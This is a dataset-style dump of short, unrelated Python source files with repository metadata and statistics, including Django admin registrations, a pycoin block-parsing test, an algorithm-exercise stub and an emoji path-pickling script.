] | 2 | 2021-02-15T12:56:58.000Z | 2021-02-21T12:38:47.000Z | version.py | bilginfurkan/Anonimce | 7d73c13ae8d5c873b6863878370ad83ec9ee5acc | [
"Apache-2.0"
] | null | null | null | version.py | bilginfurkan/Anonimce | 7d73c13ae8d5c873b6863878370ad83ec9ee5acc | [
"Apache-2.0"
] | null | null | null | version = '20201111T173146Z'
| 15 | 29 | 0.766667 | 3 | 30 | 8 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.518519 | 0.1 | 30 | 1 | 30 | 30 | 0.333333 | 0 | 0 | 0 | 0 | 0 | 0.551724 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
ba03fc30a5daab70da87fd3bbb9beedef6a580eb | 493 | py | Python | epi_judge_python/sunset_view.py | shobhitmishra/CodingProblems | 0fc8c5037eef95b3ec9826b3a6e48885fc86659e | [
"MIT"
] | null | null | null | epi_judge_python/sunset_view.py | shobhitmishra/CodingProblems | 0fc8c5037eef95b3ec9826b3a6e48885fc86659e | [
"MIT"
] | null | null | null | epi_judge_python/sunset_view.py | shobhitmishra/CodingProblems | 0fc8c5037eef95b3ec9826b3a6e48885fc86659e | [
"MIT"
] | null | null | null | from typing import Iterator, List
from test_framework import generic_test
def examine_buildings_with_sunset(sequence: Iterator[int]) -> List[int]:
# TODO - you fill in here.
return []
def examine_buildings_with_sunset_wrapper(sequence):
return examine_buildings_with_sunset(iter(sequence))
if __name__ == '__main__':
exit(
generic_test.generic_test_main('sunset_view.py', 'sunset_view.tsv',
examine_buildings_with_sunset))
| 25.947368 | 75 | 0.703854 | 60 | 493 | 5.316667 | 0.5 | 0.200627 | 0.250784 | 0.326019 | 0.181818 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.212982 | 493 | 18 | 76 | 27.388889 | 0.822165 | 0.048682 | 0 | 0 | 0 | 0 | 0.079229 | 0 | 0 | 0 | 0 | 0.055556 | 0 | 1 | 0.2 | false | 0 | 0.2 | 0.2 | 0.6 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
e84077e8e3e4204cf296691cf627d89c56af4d3e | 28 | py | Python | Python/pullstats.py | gilneidp/FinalProject | ec4f35d154bc4383ccde113126e493c1521ad21a | [
"MIT"
] | null | null | null | Python/pullstats.py | gilneidp/FinalProject | ec4f35d154bc4383ccde113126e493c1521ad21a | [
"MIT"
] | null | null | null | Python/pullstats.py | gilneidp/FinalProject | ec4f35d154bc4383ccde113126e493c1521ad21a | [
"MIT"
] | null | null | null | import pox
import oslib
| 7 | 13 | 0.714286 | 4 | 28 | 5 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.285714 | 28 | 3 | 14 | 9.333333 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
e85bc0851afc9f6a3b31186577528ce178e28e1b | 105 | py | Python | tags/admin.py | SuperLeet-CTF/SuperLeet-CTF | 3af085d310a8303ef3aff376ba930649586d5993 | [
"MIT"
] | 4 | 2017-10-09T21:53:44.000Z | 2020-12-02T19:11:08.000Z | tags/admin.py | SuperLeet-CTF/SuperLeet-CTF | 3af085d310a8303ef3aff376ba930649586d5993 | [
"MIT"
] | null | null | null | tags/admin.py | SuperLeet-CTF/SuperLeet-CTF | 3af085d310a8303ef3aff376ba930649586d5993 | [
"MIT"
] | 1 | 2020-09-02T06:02:31.000Z | 2020-09-02T06:02:31.000Z | from django.contrib import admin
from .models import Tag, TagAdmin
admin.site.register(Tag, TagAdmin)
| 15 | 34 | 0.790476 | 15 | 105 | 5.533333 | 0.666667 | 0.26506 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.133333 | 105 | 6 | 35 | 17.5 | 0.912088 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.666667 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
e86694be63a0fd722ac8d6bf34b4f75466d775b3 | 205 | py | Python | task3/api/admin.py | dnantonov/tatneft | 9ccee4426c095369cc7c57f260a90bb923119b72 | [
"MIT"
] | null | null | null | task3/api/admin.py | dnantonov/tatneft | 9ccee4426c095369cc7c57f260a90bb923119b72 | [
"MIT"
] | null | null | null | task3/api/admin.py | dnantonov/tatneft | 9ccee4426c095369cc7c57f260a90bb923119b72 | [
"MIT"
] | null | null | null | from django.contrib import admin
from api.models import GasStation, Image, Service, Fuel
admin.site.register(Image)
admin.site.register(Service)
admin.site.register(GasStation)
admin.site.register(Fuel)
| 22.777778 | 55 | 0.814634 | 29 | 205 | 5.758621 | 0.448276 | 0.215569 | 0.407186 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.082927 | 205 | 8 | 56 | 25.625 | 0.888298 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.333333 | 0 | 0.333333 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
e867ba316a566db77ef3d98e8a9246bdcc5d9212 | 130 | py | Python | app/recipes/__init__.py | janist7/mangarso.com | 74210c604b27084213b519a28ffae6f01e552900 | [
"MIT"
] | null | null | null | app/recipes/__init__.py | janist7/mangarso.com | 74210c604b27084213b519a28ffae6f01e552900 | [
"MIT"
] | null | null | null | app/recipes/__init__.py | janist7/mangarso.com | 74210c604b27084213b519a28ffae6f01e552900 | [
"MIT"
] | null | null | null | from flask import Blueprint
recipes = Blueprint('recipes', __name__, template_folder='templates')
from app.recipes import views
| 21.666667 | 69 | 0.8 | 16 | 130 | 6.1875 | 0.6875 | 0.323232 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.115385 | 130 | 5 | 70 | 26 | 0.86087 | 0 | 0 | 0 | 0 | 0 | 0.123077 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.666667 | 0 | 0.666667 | 0.666667 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 6 |
e87c0cc0d4eaa2bc26e6fe3d21fdc61e63deffae | 2,509 | py | Python | pycoin/test/parse_block_test.py | FaSan/proofofexistence | 10703675824e989f59a8d36fd8c06394e71a2c25 | [
"MIT"
] | 176 | 2015-01-01T04:29:39.000Z | 2021-12-04T06:22:44.000Z | pycoin/test/parse_block_test.py | FaSan/proofofexistence | 10703675824e989f59a8d36fd8c06394e71a2c25 | [
"MIT"
] | 15 | 2015-02-25T08:54:15.000Z | 2018-07-30T20:08:14.000Z | pycoin/test/parse_block_test.py | FaSan/proofofexistence | 10703675824e989f59a8d36fd8c06394e71a2c25 | [
"MIT"
] | 82 | 2015-01-15T12:47:23.000Z | 2020-09-25T05:25:54.000Z | #!/usr/bin/env python
import io
import unittest
from pycoin.block import Block
from pycoin.encoding import h2b
from pycoin.serialize import b2h_rev
class BlockTest(unittest.TestCase):
def test_block(self):
expected_checksum = '0000000000089F7910F6755C10EA2795EC368A29B435D80770AD78493A6FECF1'.lower()
block_data = h2b('010000007480150B299A16BBCE5CCDB1D1BBC65CFC5893B01E6619107C55200000000000790'\
'0A2B203D24C69710AB6A94BEB937E1B1ADD64C2327E268D8C3E5F8B41DBED8796974CED66471B204C3247030'\
'1000000010000000000000000000000000000000000000000000000000000000000000000FFFFFFFF0804ED6'\
'6471B024001FFFFFFFF0100F2052A010000004341045FEE68BAB9915C4EDCA4C680420ED28BBC369ED84D48A'\
'C178E1F5F7EEAC455BBE270DABA06802145854B5E29F0A7F816E2DF906E0FE4F6D5B4C9B92940E4F0EDAC000'\
'000000100000001F7B30415D1A7BF6DB91CB2A272767C6799D721A4178AA328E0D77C199CB3B57F010000008'\
'A4730440220556F61B84F16E637836D2E74B8CB784DE40C28FE3EF93CCB7406504EE9C7CAA5022043BD4749D'\
'4F3F7F831AC696748AD8D8E79AEB4A1C539E742AA3256910FC88E170141049A414D94345712893A828DE57B4C'\
'2054E2F596CDCA9D0B4451BA1CA5F8847830B9BE6E196450E6ABB21C540EA31BE310271AA00A49ED0BA930743'\
'D1ED465BAD0FFFFFFFF0200E1F505000000001976A914529A63393D63E980ACE6FA885C5A89E4F27AA08988AC'\
'C0ADA41A000000001976A9145D17976537F308865ED533CCCFDD76558CA3C8F088AC000000000100000001651'\
'48D894D3922EF5FFDA962BE26016635C933D470C8B0AB7618E869E3F70E3C000000008B48304502207F5779EB'\
'F4834FEAEFF4D250898324EB5C0833B16D7AF4C1CB0F66F50FCF6E85022100B78A65377FD018281E77285EFC3'\
'1E5B9BA7CB7E20E015CF6B7FA3E4A466DD195014104072AD79E0AA38C05FA33DD185F84C17F611E58A8658CE'\
'996D8B04395B99C7BE36529CAB7606900A0CD5A7AEBC6B233EA8E0FE60943054C63620E05E5B85F0426FFFFF'\
'FFF02404B4C00000000001976A914D4CAA8447532CA8EE4C80A1AE1D230A01E22BFDB88AC8013A0DE0100000'\
'01976A9149661A79AE1F6D487AF3420C13E649D6DF3747FC288AC00000000')
# try to parse a block
block = Block.parse(io.BytesIO(block_data))
print(block)
assert b2h_rev(block.hash()) == expected_checksum
for tx in block.txs:
print(tx)
for t in tx.txs_in:
print(" %s" % t)
for t in tx.txs_out:
print(" %s" % t)
block.check_merkle_hash()
def main():
unittest.main()
if __name__ == "__main__":
main()
| 47.339623 | 104 | 0.779992 | 114 | 2,509 | 17 | 0.552632 | 0.01548 | 0.006192 | 0.008256 | 0.011352 | 0 | 0 | 0 | 0 | 0 | 0 | 0.50144 | 0.16939 | 2,509 | 52 | 105 | 48.25 | 0.428503 | 0.016341 | 0 | 0.051282 | 0 | 0 | 0.638774 | 0.632146 | 0 | 1 | 0 | 0 | 0.025641 | 1 | 0.051282 | false | 0 | 0.128205 | 0 | 0.205128 | 0.102564 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
e88c58cacb028ae009886823cf496eb85217a7c7 | 1,760 | py | Python | rpi-rgb-led-matrix-master/makeEmojiPickleList.py | hammal/macapar | 05fb84b8f5e967ed6d3edb0891ac58674e6b60bc | [
"MIT"
] | null | null | null | rpi-rgb-led-matrix-master/makeEmojiPickleList.py | hammal/macapar | 05fb84b8f5e967ed6d3edb0891ac58674e6b60bc | [
"MIT"
] | null | null | null | rpi-rgb-led-matrix-master/makeEmojiPickleList.py | hammal/macapar | 05fb84b8f5e967ed6d3edb0891ac58674e6b60bc | [
"MIT"
] | null | null | null | import os
import pickle
emojipaths = []
for root, dirs, files in os.walk("./emojis/emotions/", topdown=False):
for name in files:
if name[-4:] == ".png" and name[0] != ".":
emojipaths.append(os.path.abspath(os.path.join("./emojis/emotions/",name)))
# save as pickle
with open("emojiemotionlist.txt", "wb") as fp: #Pickling
pickle.dump(emojipaths, fp)
emojipaths = []
for root, dirs, files in os.walk("./emojis/aon/", topdown=False):
for name in files:
if name[-4:] == ".png" and name[0] != ".":
emojipaths.append(os.path.abspath(os.path.join("./emojis/aon/",name)))
# save as pickle
with open("emojiaonlist.txt", "wb") as fp: #Pickling
pickle.dump(emojipaths, fp)
emojipaths = []
for root, dirs, files in os.walk("./emojis/antik/", topdown=False):
for name in files:
if name[-4:] == ".png" and name[0] != ".":
emojipaths.append(os.path.abspath(os.path.join("./emojis/antik/",name)))
# save as pickle
with open("antiklist.txt", "wb") as fp: #Pickling
pickle.dump(emojipaths, fp)
emojipaths = []
for root, dirs, files in os.walk("./emojis/gunnar/", topdown=False):
for name in files:
if name[-4:] == ".png" and name[0] != ".":
emojipaths.append(os.path.abspath(os.path.join("./emojis/gunnar/",name)))
# save as pickle
with open("gunnarlist.txt", "wb") as fp: #Pickling
pickle.dump(emojipaths, fp)
emojipaths = []
for root, dirs, files in os.walk("./emojis/martin/", topdown=False):
for name in files:
if name[-4:] == ".png" and name[0] != ".":
emojipaths.append(os.path.abspath(os.path.join("./emojis/martin/",name)))
# save as pickle
with open("martinlist.txt", "wb") as fp: #Pickling
pickle.dump(emojipaths, fp) | 29.830508 | 85 | 0.621023 | 249 | 1,760 | 4.389558 | 0.168675 | 0.054895 | 0.077768 | 0.096066 | 0.878317 | 0.878317 | 0.768527 | 0.768527 | 0.768527 | 0.696249 | 0 | 0.006978 | 0.185795 | 1,760 | 59 | 86 | 29.830508 | 0.755757 | 0.064773 | 0 | 0.540541 | 0 | 0 | 0.163814 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.054054 | 0 | 0.054054 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
e8a954eed5c830425f753bd2182902f5f612c8b5 | 49 | py | Python | ex43a.py | shwezinoo/python-excercises | f2507ad8ec161bb1e12a3667946f2cb48c422bb4 | [
"MIT"
] | null | null | null | ex43a.py | shwezinoo/python-excercises | f2507ad8ec161bb1e12a3667946f2cb48c422bb4 | [
"MIT"
] | null | null | null | ex43a.py | shwezinoo/python-excercises | f2507ad8ec161bb1e12a3667946f2cb48c422bb4 | [
"MIT"
] | null | null | null | from sys import exit
from random import randint
| 12.25 | 26 | 0.816327 | 8 | 49 | 5 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.183673 | 49 | 3 | 27 | 16.333333 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.